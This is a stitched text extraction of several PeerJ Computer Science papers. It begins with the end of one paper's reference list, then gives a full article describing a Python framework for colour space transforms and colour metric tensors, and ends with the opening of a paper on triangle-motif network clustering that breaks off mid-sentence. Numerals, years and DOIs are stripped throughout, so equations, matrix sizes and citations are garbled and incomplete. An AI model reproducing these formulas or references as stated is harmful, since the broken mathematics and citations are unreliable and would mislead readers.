ecml- . berlin heidelberg: springer, – . luengo j, herrera f. . an automatic extraction method of the domains of com- petence for learning classifiers using data complexity measures. knowledge and information systems ( ): – doi . /s - - - . màcia n, bernadó-mansilla e, orriols-puig a, kam ho t. . learner excellence biased by data set selection: a case for data characterisation and artificial data sets. pattern recognition ( ): – doi . /j.patcog. . . . mantovani rg, rossi ald, vanschoren j, bischl b, carvalho acplf. . to tune or not to tune: recommending when to adjust svm hyper-parameters via meta- learning. in: international joint conference on neural networks (ijcnn), – . orriols-puig a, macià n, ho tk. . documentation for the data complexity library in c++. technical report. la salle—universitat ramon llull, barcelona. available at http://dcol.sourceforge.net/ . pedregosa f, varoquaux g, gramfort a, michel v, thirion b, grisel o, blondel m, prettenhofer p, weiss r, dubourg v, vanderplas j, passos a, cournapeau d, brucher m, perrot m, duchesnay e. . scikit-learn: machine learning in python. journal of machine learning research : – . provost f, jensen d, oates t. . efficient progressive sampling. in: proceedings of the fifth acm sigkdd international conference on knowledge discovery and data mining, kdd’ . new york: acm, – . ratanamahatana ca, gunopulos d. . feature selection for the naive bayesian classifier using decision trees. applied artificial intelligence ( – ): – doi . / . scott d. . multivariate density estimation: theory, practice, and visualization. hobo- ken: wiley. skala m. . hypergeometric tail inequalities: ending the insanity. arxiv preprint. arxiv: . . smith mr, martinez t, giraud-carrier c. . an instance level analysis of data complexity. machine learning ( ): – doi . /s - - -z. smith-miles k, baatar d, wreford b, lewis r. . towards objective measures of algorithm performance across instance space. computers & operations research : – doi . /j.cor. . . . smith-miles k, lopes l. . measuring instance difficulty for combinatorial optimization problems. computers & operations research ( ): – doi . /j.cor. . . . zubek and plewczynski ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . /rsta. . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /j.patcog. . . http://dcol.sourceforge.net/ http://dx.doi.org/ . / http://arxiv.org/abs/ . http://dx.doi.org/ . /s - - -z http://dx.doi.org/ . /j.cor. . . http://dx.doi.org/ . /j.cor. . . http://dx.doi.org/ . /peerj-cs. thrun sb, bala jw, bloedorn e, bratko i, cestnik b, cheng j, jong kad, dzeroski s, fisher dh, fahlman se, hamann r, kaufman ka, keller s, kononenko i, kreuziger js, michalski rs, mitchell ta, pachowicz pw, vafaie h, welde wvd, wenzel w, wnek j, zhang j. . the monk’s problems: a performance comparison of different learning algorithms. technical report cmu.-cs- - . carnegie mellon university. yin l, ge y, xiao k, wang x, quan x. . feature selection for high-dimensional imbalanced data. neurocomputing : – doi . /j.neucom. . . . zubek and plewczynski ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /j.neucom. . . http://dx.doi.org/ . /peerj-cs. submitted august accepted february published march corresponding author ivar farup, ivar.farup@ntnu.no academic editor klara kedem additional information and declarations can be found on page doi . /peerj-cs. copyright farup distributed under creative commons cc-by . open access a computational framework for colour metrics and colour space transforms ivar farup faculty of computer science and media technology, gjøvik university college, norway abstract an object-oriented computational framework for the transformation of colour data and colour metric tensors is presented. the main idea of the design is to represent the transforms between spaces as compositions of objects from a class hierarchy providing the methods for both the transforms themselves and the corresponding jacobian matrices. in this way, new colour spaces can be implemented on the fly by transforming from any existing colour space, and colour data in various formats as well as colour metric tensors and colour difference data can easily be transformed between the colour spaces. this reduces what normally requires several days of coding to a few lines of code without introducing a significant computational overhead. the framework is implemented in the python programming language. subjects computer vision, graphics, optimization theory and computation, scientific computing and simulation, software engineering keywords colour metrics, colour space, transform, object-oriented, python introduction colour data such as measured colours, specified colours or pixels of colour images are most commonly described as sets of points in a three-dimensional space—a so-called colour space. many different colour spaces are currently in use in various settings. for many applications, selecting the best colour space for processing the data can be crucial (plataniotis & venetsanopoulos, ). converting between all the different colour spaces can be challenging. different conventions for scaling and normalisation is used, and many of the colour spaces commonly in use are inaccurately defined. the complexity of conversion is particularly present for computations involving colour metric data, which, by nature, is tensorial (deza & deza, ), giving rise to the need for not only the direct transformations, but also the corresponding jacobian matrices—a tedious and error-prone process (pant & farup, ). so far, no common framework for such transformations of colour data and metrics including the automated computation of jacobian matrices has been constructed. from other fields of computational science, it is well established that object-oriented frameworks can be useful for simplifying such matters (beall & shephard, ). with the advent of modern high-level interpreted languages, the computational overhead is not nearly as high as before, and the ease of use has increased significantly (cai, langtangen & moe, ). thus, in order to simplify the matters for colour science and engineering, an object-oriented framework for colour space construction, and conversion of colour how to cite this article farup ( ), a computational framework for colour metrics and colour space transforms. peerj comput. sci. :e ; doi . /peerj-cs. https://peerj.com mailto:ivar.farup@ntnu.no https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://dx.doi.org/ . /peerj-cs. data and colour metric tensor data is designed. the framework is currently limited to three-dimensional colour spaces. following the background material on the principles of transforming colour data and related tensorial data in the following section, the principles and ideas underlying the framework are presented. to demonstrate to which degree the framework simplifies the implementation of colour data and metric transformations, an implementation of the framework using the high-level programming language python (van rossum & drake, ) is applied to some standard example problems. background transformation of colour data transformations between different colour spaces can in general take the shape of a function, x̄ = x̄(x), where x = (x ,x ,x )t represents a colour, i.e., a point in a colour space. fortunately, most common colour space conversions are made up of a small set of relatively simple mathematical operations. the linear transformation is a very common ingredient in the transforms. some colour spaces, such as, e.g., the ciecat colour adaptation space (moroney et al., ), are even defined simply by a linear transformation from some other colour space: x̄ =ax, ( ) where a is a × constant matrix. combined with the so-called gamma correction, which is applied channel-wise, most rgb type colour spaces, and also, e.g., the ipt (ebner & fairchild, ) colour space can be construced x̄i=sgn(xi)|xi| γ , ( ) where γ > is the constant exponent. for many perceptual colour spaces such as cielab, both cartesian and cylindrical coordinates are commonly used for describing the chromatic plane. the transformation from cartesian to polar is x̄ =x , x̄ = √ x +x , x̄ =atan (x ,x ), ( ) with the corresponding inverse transform x̄ =x , x̄ =x cos(x ), x̄ =x sin(x ). ( ) farup ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. chromaticities and luminances are often represented in projective spaces such as xyy, x̄ = x x +x +x , x̄ = x x +x +x , x̄ =x . ( ) colour spaces used for colour metrics such as ee (oleari, melgosa & huertas, ) and the various din metrics (cui et al., ) often include a logarithmic compression of some or all of the channels such as lightness and chroma (radius in polar coordinates): x̄i=ailn( +bixi), ( ) where ai and bi are the parameters of the transform. recently, the poincaré disk representation of the hyperbolic plane has been used for representing the chromatic plane (lenz, carmona & meer, ; farup, ). the chroma-preserving mapping to the poincaré disk can be written as a mapping of the radius in polar coordinates as x̄ = tanh ( x r ) , ( ) where r> is the radius of curvature. besides these more generic transformations, various non-linear transformation functions specific to individual colour spaces are used in such cases as srgb, cielab, cieluv, the underlying colour space of the ciede metric, etc. transformation of tensorial data most colour metrics can be represented in the form of a line element, or a differential quadratic form (wyszecki & stiles, , chapter . ), as ds =dxt gdx. ( ) here, g is the metric tensor—a function of the coordinates. for metrics defined as euclidean distances in a given colour space, the metric tensor is the identity tensor, i, in the given space. some colour metrics, like, e.g., ciede , cannot be written in this form, but can be linearised—or riemannised—to a good approximation (pant & farup, ). under a coordinate transformation, x̄ = x̄(x), this metric transforms according to ds =dxt gdx =dx̄t ∂x ∂x̄ t g ∂x ∂x̄ dx̄ =dx̄t ḡdx̄, ( ) where∂x/∂x̄ is the jacobian matrix of the coordinate transform with componentns∂xi/∂x̄j. in other words, the metric tensor transforms according to ḡ= ∂x ∂x̄ t g ∂x ∂x̄ . ( ) farup ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. under composition of several coordinate transformations, x̃ = x̃(x̄)= x̃(x̄(x)), the process is nested, ds =dx̃t ∂x̄ ∂x̃ t ∂x ∂x̄ t g ∂x ∂x̄ ∂x̄ ∂x̃ dx̃, ( ) g̃= ∂x̄ ∂x̃ t ∂x ∂x̄ t g ∂x ∂x̄ ∂x̄ ∂x̃ , ( ) which can also be seen directly from the chain rule for the jacobian matrices, ∂x ∂x̃ = ∂x ∂x̄ ∂x̄ ∂x̃ . ( ) all the points with unit distance from a given central point—a unit ball—constitute an ellipsoid xt g x = . ( ) the cross section of this ellipsoid with a principal plane in a given coordinate is obtained by setting the corresponding xi = , reducing the ellipsoid to an ellipsis (pant & farup, ), ( x x )(g g g g )( x x ) = , ( ) with angle θ and semi-axes a and b given by tan( θ)= g g −g , ( ) a= √ g +g cotθ , ( ) b= √ g −g cotθ . ( ) system architecture since the computation of generic colour space transforms and, in partiular the composition of their jacobian matrices can be a tedious and error-prone process (see, e.g., pant & farup, ), an object-oriented framework for transforming colour and metric data between colour spaces has been implemented as a python package colour. the package consists of six partially interdependent modules space, data, metric, tensor, statistics and misc. the relationship between the modules is shown in fig. . in the figure, the arrows indicate dependencies between the modules in the form of python imports. each of the modules contain functions, classes and predefined objects with the purpose of simplifying the implementation of new colour spaces and metrics. farup ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure structure of the modules within the colour package. the arrows indicate dependencies in the form of python imports. representing colour spaces the core functionality of the colour space and colour metric transforms is found in the space module. the basic idea in designing the object oriented framework is to realise a colour space as an object, and to facilitate the construction of new such objects by providing classes for transforming new colour spaces from already existing ones. the class hierarchy which constistutes the core of the of the module, is shown in fig. . all boxes represent classes, and the arrows denote class inheritance. italicized method names indicate methods that should be overridden in a subclass. details about attributes and auxiliary methods etc. have been left out for readability. all colour space objects must derive from the abstract space class, and as such implement the methods to_xyz and from_xyz for converting colour data between the xyz colour space and the colour space represented by the object, and the methods jacobian_xyz and inv_jacobian_xyz for computing the corresponding jacobian matrix and its inverse. the two latter methods are implemented in space as inverses of each other, so the subclasses only need to implement one of them—the other one can be inherited. the colour data is represented as n × numpy (oliphant, ) ndarrays, and the jacobian matrices as n × × ndarrays. all transformations between colour spaces must go through xyz, which thus serves a special role, and has a separate class of its own. here, the transformations are simply the identity transform, and the jacobian matrices are identity matrices. all other colour spaces farup ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure structure of the classes within the space module. data types and parameters are not shown for the derived methods. will be built by transforming colour data from an already existing colour space, starting from xyz. to facilitate making the specific transforms, an abstract class transform is provided. during instantiation of a transformed colour space object, the base space of the transformation has to be set. the virtual methods to_base and from_base for converting colour data to and from the base base, and jacobian_base and inv_jacobian_base for computing the jacobian matrix and its inverse between the current space and the base space must be provided in the derived classes. the methods to_xyz, from_xyz, jacobian_xyz, and inv_jacobian_xyz are implemented in the base class transform using the transformation between the current space and the base space (provided by derived classes) and the corresponding transformations in the base class, see eq. ( ). hence, there is no need to reimplement these in the derived classes. finally, the concrete colour space tranforms are implemented as classes transformxxx derived from transform. they must all implement the methods to_base, from_base and either jacobian_base or inv_jacobian_base. the remaining methods will be inferred by inheritance. in some cases, though, it is more efficient to provide more methods in order to reduce the computational cost. for example, in transformlinear, both methods jacobian_base and inv_jacobian_base are provided in order to avoid inverting every single jacobian matrix for large data sets. representing colour and metric data the colour space objects constructed by the method described above, will convert colour data represented as n × ndarrays (n colour data points). for real-life applications, colours some times come as single data points ( -vectors), some times as lists of colour data (n × matrices), and some times as images (m ×n × arrays). in order for the farup ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure the data and tensordata classes for keeping track of colour data and metric data, respec- tively. user not having to deal with converting back and forth between these formats, as well as remembering in which colour space all the data is given, a separate class data for storing colour data has been implemented as part of the data module, cf. fig. . again, the boxes denote classes. in this module, there are no inheritance relationship between the classes, but they are related by the tensordata class having an attribute of the data type. a colour data object can be instantiated with single colour data, lists of colour data, or colour images in any implemented colour space. the data object takes the colour space (object) of the data as an argument, and keeps a dictionary of the colour spaces in which the data in question has been computed. when the colour data in a given space is requested (using the get method), it first checks the dictionary whether it has already been computed. if not, it is computed, stored in the dictionary and returned. all the actual computations are taken care of by the hierarcy of colour space objects representing the transforms necessary for building the colour space. a similar approach is taken for colour metric data in the form of colour tensors, see fig. . in this case, both the locations of the colour metrics (as colour data), and the metrics themselves are represented in the class. like for the colour data, a dictionary of the computed tensors is maintained. for the conversion between the different colour spaces, the jacobian matrices are applied according to eq. ( ). the nested tensor transforms, eq. ( ), are implicitly taken care of by the colour space class hierarchy without the user having to interfere. colour metrics, tensors and statistics the four remaining modules, metric, tensor, statistics, and misc contain separate functions (not part of the class hierarchy) for computing various properties of colour data, colour transforms, and sets of these. the metric module has functions for computing the most common colour metrics, such as the standard cie eab and euv metrics, ciede (luo, cui & rigg, ), the different versions of the din metric as described by cui et al. ( ), the log-compressed osa-ucs metric ee by oleari, melgosa & huertas ( ), as well as a general euclidean distance and the poincare disk metric developed in reference (farup, ) in any colour space. all these functions take two colour data objects of the same size as arguments, and return an n-vector of colour differences. the tensor module has functions for computing the metric tensors corresponding to the metrics in the metric package. the functions take one colour data object as argument, and farup ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. returns the corresponding tensordata object. the statistics module contains functions for calculating various statistics of colour metric data, such as the stress measure (garcía et al., ) and pant’s r-values (pant & farup, ; pant, farup & melgosa, ). the misc module contains miscellaneous supporting functions. computational complexity the framework has been implemented using numpy (oliphant, ) ndarrays, and all operations for colour and metric conversion are vectorised. thus, all the real computations take place using the highly optimised underlying libraries for matrices, such as lapack (anderson et al., ) etc. no loops over individual colour data are implemented in the high-level language. thus, there are only two sources of computational overhead by using the framework. first, there are the function calls associated with computing the transformations between a given colour space and its bases all the way back to the ciexyz colour space. these function calls will only take place once per transformation call. this can be a significant overhead when the data set consists of only one or very few data points, but then the computation is very quick anyway. for bigger colour data sets, such as images, this will represent only very few function calls (given by the number of steps in the transformation from ciexyz to the given space), and thus be negligible in comparison with the real computation, which takes place at the highly optimised low-level code. secondly, all colour and metric conversions go through the ciexyz colour space. when converting between two colour spaces based on a common basis other than ciexyz, an unneccesary conversion back and forth between this common basis and ciexyz will inevitably take place. it would, in principle, be possible to eliminate this by advanced optimisation techniques, but since the computations are already fast (fractions of a second even for quite large images), and the goal of the framework has been ease of implementation rather than computational efficiency, this has not been prioritized. not all of the operations in the statistics module are vectorised, although this would in principle also be possible. the reason for this is that they are mainly meant for colour research applications, and as such, they are not expected to be used in production. for the relevant use in research, data collection etc. will be much more time consuming than the actual computations, so computational efficiency has not been emphasized in this part of the framework. example application in order to demonstrate the power of the proposed approach, a simple demo application is shown in fig. . in this short code (less than a page), (i) a new colour space is implemented, (ii) individual colours, lists of colours and a colour image is converted to the new colour space, (iii) the tensorial data corresponding to the macadam ellipses is converted by the help of the jacobian matrices of the transformation to the new space, and (iv) the colour difference between two images is computed as a eucildean distance in the newly constructed colour space. these operations would normally require days of programming, but with the use of the proposed framework it is all achieved by a few lines of code. farup ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure small demo of the colour package. in lines – , the library is imported. in a real application, one would normally only import the colour package (import colour), and refer to the elements as, e.g., colour.space.transformlinear etc., but here the specific classes, objects and functions needed are imported specifically, simply in order to reduce the size and improve the readability of the remaining code. the transformation to the ipt colour space (ebner & fairchild, ) is composed of a linear transform from xyz followed by a gamma correction, followed by final linear farup ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure an image (a) and its gamut clipped version (b). figure the i (a), p (b), and t (c) planes of the image shown in fig. a. farup ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure the macadam ellipses plotted in the pt-plane of the ipt colour space. figure difference maps of the two images shown in fig. for eab (a), e (b), and the euclidean distance in the ipt colour space (c). transform. the code for constructing this colour space is given in lines – of fig. . it should be noted that the programmer does not need to specify anything about the computation of the corresponding jacobian matrices—everyting is taken care of by the constructors of the transformation classes. once the colour space is constructed, the data class can use it for converting colours in various formats such as single data points—lines – —giving [ . e- . e- . e- ], farup ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. lists of colour points—lines – —giving [[ . e- . e- . e- ] [ . e- . e- . e- ] [ . e+ . e+ . e+ ]], and even colour images (lines – ). the individual ipt colour planes of the image shown in fig. a resulting from this (lines – ) are shown in fig. . in order to demonstrate also the transformation of tensorial colour data, the code in lines – loads, transforms, and plots the macadam ellipses (macadam, ) in the pt-plane of the ipt space. the latter includes the tedious process of computing the transformation of the corresponding metric tensors according to eq. ( ). the resulting plot is shown in fig. . similarly, the colour.metric module can compute colour differences of colour data in any format, including images. for example, the code in lines – of fig. computes the difference maps of the two images shown in fig. for eab, e and the euclidean distance in the newly implemented ipt colour space. the results are shown in fig. . please note that the entire code used to generate figs. – is shown in fig. . conclusion an object-oriented computational framework for colour metrics and colour has been designed and implemented in python. the framework strongly simplifies the implementation of new colour spaces for transfroming colour data and as well as tensorial colour metric data between the various colour spaces without compromising too much on the computational complexity. the code is freely available at github (https://github.com/ifarup/colourspace). future extensions could include icc support, computation geodesics based on the colour metrics (pant & farup, ), computation and representation of colour gamuts (bakke, farup & hardeberg, ), as well as gamut mapping algorithms (alsam & farup, ) in any colour space, and under any colour metric. additional information and declarations funding this research has been supported by the research council of norway through project no. ‘hypercept – colour and quality in higher dimensions’. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the author: research council of norway: . farup ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://github.com/ifarup/colourspace http://dx.doi.org/ . /peerj-cs. competing interests the author declares there are no competing interests. author contributions • ivar farup conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. data availability the following information was supplied regarding data availability: https://github.com/ifarup/colourspace. references alsam a, farup i. . colour gamut mapping as a constrained variational problem. in: salberg a-b, hardeberg jy, jenssen r, eds. image analysis, th scandinavian con- ference, scia . lecture notes in computer science, vol. . berlin, heidelberg: springer, – . anderson e, bai z, bischof c, blackford s, demmel j, dongarra j, du croz j, green- baum a, hammarling s, mckenney a, sorensen d. . lapack users’ guide. rd edition. philadelphia: society for industrial and applied mathematics. bakke am, farup i, hardeberg jy. . evaluation of algorithms for the determi- nation of color gamut boundaries. journal of imaging science and technology ( ): – doi . /j.imagingsci.technol. . . . . beall mw, shephard ms. . an object-oriented framework for reliable numerical simulations. engineering with computers ( ): – doi . /s . cai x, langtangen hp, moe h. . on the performance of the python programming language for serial and parallel scientific computations. scientific programming ( ): – doi . / / . cui g, luo mr, rigg b, roesler g, witt k. . uniform colour spaces based on the din colour-difference formula. color research & application ( ): – doi . /col. . deza mm, deza e. . encyclopedia of distances. berlin, heidelberg: springer. ebner f, fairchild md. . development and testing of a color space (ipt) with improved hue uniformity. in: the sixth color imaging conference: color science, systems and applications. springfield: society for imaging science and technology, – . farup i. . hyperbolic geometry for colour metrics. optics express ( ): – doi . /oe. . . garcía pa, huertas r, melgosa m, cui g. . measurement of the relationship between perceived and computed color differences. journal of the optical society of america a ( ): – doi . /josaa. . . farup ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://github.com/ifarup/colourspace http://dx.doi.org/ . /j.imagingsci.technol. . . . http://dx.doi.org/ . /s http://dx.doi.org/ . / / http://dx.doi.org/ . /col. http://dx.doi.org/ . /col. http://dx.doi.org/ . /oe. . http://dx.doi.org/ . /oe. . http://dx.doi.org/ . /josaa. . http://dx.doi.org/ . /peerj-cs. lenz r, carmona pl, meer p. . the hyperbolic geometry of illumination-induced chromaticity changes. in: computer vision and pattern recognition, . cvpr’ . ieee conference on. piscataway: ieee, – . luo mr, cui g, rigg b. . the development of the cie colour-difference formula: ciede . color research & application ( ): – doi . /col. . macadam dl. . visual sensitivities to color differences in daylight. journal of the optical society of america a ( ): – doi . /josa. . . moroney n, fairchild md, hunt rwg, li c, luo mr, newman t. . the ciecam color appearance model. in: proceedings of is & t and sid’s th color imaging conference: color science and engineering: systems, technologies, applications. springfield: society for imaging science and technology, – . oleari c, melgosa m, huertas r. . euclidean color-difference formula for small– medium color differences in log-compressed osa-ucs space. journal of the optical society of america a ( ): – . oliphant te. . python for scientific computing. computing in science & engineering : – doi . /mcse. . . pant dr, farup i. . riemannian formulation and comparison of color difference formulas. color research & application ( ): – doi . /col. . pant dr, farup i. . geodesic calculation of color difference formulas and comparison with the munsell color order system. color research & application ( ): – doi . /col. . pant dr, farup i, melgosa m. . analysis of three euclidean color-difference formulas for predicting the average rit-dupont color-difference ellipsoids. in: proceedings of aic — th international aic congress, – . plataniotis kn, venetsanopoulos an. . color image processing and applications. new york: springer. van rossum g, drake jr fl. . python reference manual. amsterdam: centrum voor wiskunde en informatica amsterdam. wyszecki g, stiles ws. . color science—concepts and methods, quantitative data and formulae. new york: john wiley & sons. farup ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /col. http://dx.doi.org/ . /josa. . http://dx.doi.org/ . /mcse. . http://dx.doi.org/ . /col. http://dx.doi.org/ . /col. http://dx.doi.org/ . /peerj-cs. comics: a community property-based triangle motif clustering scheme comics: a community property-based triangle motif clustering scheme yufan feng , shuo yu , kaiyuan zhang , xiangli li and zhaolong ning , school of software, dalian university of technology, dalian, china state key laboratory for novel software technology, nanjing university, nanjing, china abstract with the development of science and technology, network scales of various fields have experienced an amazing growth. networks in the fields of biology, economics and society contain rich hidden information of human beings in the form of connectivity structures. network analysis is generally modeled as network partition and community detection problems. in this paper, we construct a community property-based triangle motif clustering scheme (comics) containing a series of high efficient graph partition procedures and triangle motif-based clustering techniques. in comics, four network cutting conditions are considered based on the network connectivity. we first divide the large-scale networks into many dense subgraphs under the cutting conditions before leveraging triangle motifs to refine and specify the partition results. to demonstrate the superiority of our method, we implement the experiments on three large-scale networks, including two co-authorship networks (the american physical society (aps) and the microsoft academic graph (mag)), and two social networks (facebook and gemsec-deezer networks). we then use two clustering metrics, compactness and separation, to illustrate the accuracy and runtime of clustering results. a case study is further carried out on aps and mag data sets, in which we construct a connection between network structures and statistical data with triangle motifs. results show that our method outperforms others in both runtime and accuracy, and the triangle motif structures can bridge network structures and statistical data in the academic collaboration area. subjects algorithms and analysis of algorithms, graphics, network science and online social networks keywords community property, triangle motif, large network, clustering introduction in all aspects of human endeavor, we are in the world of large-scale data, embracing the aspects of biology, medicine, social, traffic, and science (ning et al., ). these data sets describe the complicated real-world systems from various and complementary viewpoints. generally, the entities in real-world systems are modeled as nodes, whose connections and relationships are modeled as edges. those networks become new carriers of rich information from domain-specific areas, such as the reciprocity among people in online social networks (koll, li & fu, ). more than that, human beings are inclined to cooperate or participate in group activities, which can be reflected in social and academic collaboration networks. to be more specific, in academic area, big scholarly data grows rapidly, containing millions of authors, papers, citations, figures, tables, and other how to cite this article feng y, yu s, zhang k, li x, ning z. . comics: a community property-based triangle motif clustering scheme. peerj comput. sci. :e doi . /peerj-cs. submitted december accepted february published march corresponding author zhaolong ning, zhaolongning@dlut.edu.cn academic editor yilun shang additional information and declarations can be found on page doi . /peerj-cs. copyright feng et al. distributed under creative commons cc-by . http://dx.doi.org/ . /peerj-cs. mailto:zhaolongning@�dlut.�edu.�cn https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://www.creativecommons.org/licenses/by/ . / http://www.creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ massive scale related data, such as digital libraries and scholarly networks (xia et al., ). as collaboration behaviors among scholars are becoming frequent, collaboration networks are generally in large-scale and contain rich collaboration information, reflecting the cooperation patterns among scholars in different research areas. bordons et al. ( ) regard the academic teams as scientists communities, in which scholars can share research methods, materials, and financial resources rather than institutions organized by fixed structures (barjak & robinson, ). furthermore, the ternary closures in social networks constitute a minimal stable structure; that is, a loop with three nodes. the number of ternary closures in social networks changes over time, which reveals the evolvement of human social behaviors. besides, the definition of a clustering coefficient is based on the distributions of ternary closures. milo et al. ( ) defined small network structures as motifs to present interconnections in complex networks by numbers that are significantly higher than those in randomized networks. motifs can define universal classes of networks, and researchers are carrying on the motif detection experiments on networks from different areas, such as biochemistry, neurobiology, and engineering, to uncover the existence of motifs and the corresponding structure information in networks (ribeiro, silva & kaiser, ; bian & zhang, ). hence, triangle motifs can be used to uncover relationships in networks. connectivity is a fundamental character in both graph theory and network science. when networks are in small-scale, the dense areas can be easily identified. however, with the rapid growth of network scale and diversity, many graph partition methods, community detection, and clustering algorithms fail to uncover the information of graph structure. graph partition and mining algorithms consume a large amount of time when dealing with large-scale networks, for example, the gspan algorithm (yan & han, ) and the min–cut algorithm (stoer & wagner, ), which overlook the elementary network structures. the clusters and subgraphs of a large network are generally have small internal distances and large external distances among nodes. considering the ternary closures, triangle network motifs have been regarded as elementary units in networks. however, a general method to cluster the communities and analyze the relationships with community properties and triangle motifs effectively is still lacking. in this paper, we propose a community property-based triangle motif clustering scheme (comics) to cluster network communities, and analyze the relationships with triangle motifs. in this method, we partition networks with the edge connection properties and regard the undirected and unweighted complete triangle motifs as the element clustering units. the partition operations are based on four network cutting conditions, whose definitions are based on the network connectivity to maintain the massive links in networks. more than that, by considering the american physical society (aps) and microsoft academic graph (mag) data sets in the academic analysis area, we regard each cluster generated from the input network as an academic team, and define three metrics: teamwork of collaborator variance (tcv), teamwork of paper variance (tpv), and motif variances of scholars (msv) to evaluate the feng et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ behaviors of the detected academic teams. our contributions can be summarized as follows: � by jointly considering time complexity and clustering accuracy, we construct the comics, which mines the structure information with complete triangle motifs. a series of speed-up and refining methods, graph partition and refining techniques, are integrated to improve the performance of the basic clustering process. � we prove the time complexity of the presented algorithm is o(rn ), where r is the number of the clustered subgraphs from the original large network, and n is the number of nodes. � we regard the undirected and unweight complete triangle motif as the elementary unit instead of nodes in the clustering procedure. our work verifies that the complete triangle motif is available in network analysis. � we define three metrics to analyze the hidden information in academic collaboration networks. performance evaluations show that the academic teams with high quantity of scholar motif variances also have high values of tcvs. the roadmap of this paper is illustrated as follows. we briefly illustrate the related works in the following section. after that, a series of fundamental definitions, problem statement, and some necessary notations are described. then, we describe the architecture of comics in details. we evaluate the performance of our method with three large-scale networks as case studies in the experiment section. finally, we conclude this paper. related work information mining from large-scale networks is a significant research topic, reflecting the connecting patterns, and the social relationships among different entities (shi et al., ; schaeffer, ). in collaboration networks, the information reflects the collaboration patterns and academic social relationships among scholars in different disciplines. community detection is traditionally considered as a kind of graph partition to discover exhaustive and disjoined node clusters in a given network (khan et al., ). the discovery of structures in networks has attracted scholars’ attentions for a long time. the authors in leskovec et al. ( ) explore from a novel perspective to identify meaningful communities in large social and information networks. they notice that large networks have very different structures. for example, different transcription networks from escherichia coli and saccharomyces cerevisiae have large differences in the frequency motif structures (wegner, ). over the past years, a number of graph clustering methods have been investigated. for example, evolutionary algorithms (eas) have been proposed and applied successfully in the network optimization and clustering problems (gong et al., ). recently, scholars have successfully developed both single- and multi-objective eas to discover internal structure information of networks (li & liu, ; pizzuti, ). a particle swarm optimization algorithm is put forward, which reveals community structures in large-scale social networks (cai et al., ). in girvan & newman ( ), node centrality and betweeness centrality were used to extract feng et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ communities in a network. since modularity is becoming very popular by partitioning networks into non-overlapping subgraphs, modularity score, compactness-isolation, and other criteria are leveraged to evaluate functions in large graph partition problems bagrow ( ). a number of large-scale partition methods based on community detection start with a given seed, and then expand by iteratively adding the neighboring node that contributes most to the score function, until the score function stops improving (luo, wang & promislow, ; ma et al., ). the authors in du et al. ( ) developed an efficient community detection method in social networks, which combines the topological information with the entity attributions to detect network communities. however, this method works for merely part of network structures. motifs in networks are small connected subnetworks, occurring in significant high frequencies and have recently gathered attentions. motifs in networks have been studied as elementary structures in complex network analysis (shervashidze et al., ). in hypergraphs, the clustering algorithms mainly focus on transforming the hypergraphs into simple graphs (zhou, huang & schölkopf, ). then, the simple graphs can be clustered with spectral clustering procedures based on the normalized laplacian matrices (li & milenkovic, ). in that case, the motifs can be constructed with nodes from different graph layers of hypergraphs (zhou, huang & schölkopf, ), for example, a triangle motif can be used to represent one heterogeneous hypergraph with three different layers. more than that, conductance is a vital definition in spectral clustering (louis, ; li & milenkovic, ). hence, in large-scale networks, spectral clustering and motif are combined to large-scale network clustering. triangle motif structures guarantee the structural connections. the motif-based conductance ensures the applicability spectral clustering in large-scale networks. some local graph clustering methods have been investigated by incorporating high-order network information captured by small subgraphs (yin et al., ; lee, gharan & trevisan, ; li et al., b). in wegner ( ), the authors define a subgraph cover to represent the network with motifs. the cover consists of a set of motifs and their corresponding frequencies. besides, the network motifs can be detected by comparing the frequencies of subgraphs in the original network with a statistical model. the authors in wegner ( ) notice that real networks contain significant densities of different motifs. it illustrates networks in different fields hold different collaboration patterns, and motifs are the fingerprints of different networks. by observing the characteristics from real networks, benson, gleich & leskovec ( ) develop a generalized framework to cluster networks on basis of higher-order connected patterns. a framework is proposed to model the relations between higher-order motif instances and graph nodes with a bipartite graph (li et al., a). in monti, otness & bronstein ( ), motifnet is introduced to deal with directed graphs by exploiting local graph motifs. in order to tackle the graph analysis problem, we combine the graph partition method with the motif-based clustering procedure to speed up the clustering process. feng et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ system model and problem formulation in this section, we present basic theoretical definitions about cutting conditions and the mathematical expressions of motifs. after that, we describe the investigated problems in details. comparative conditions for cluster in this subsection, we introduce four conditions to partition the original large collaboration networks into different clusters. for a given 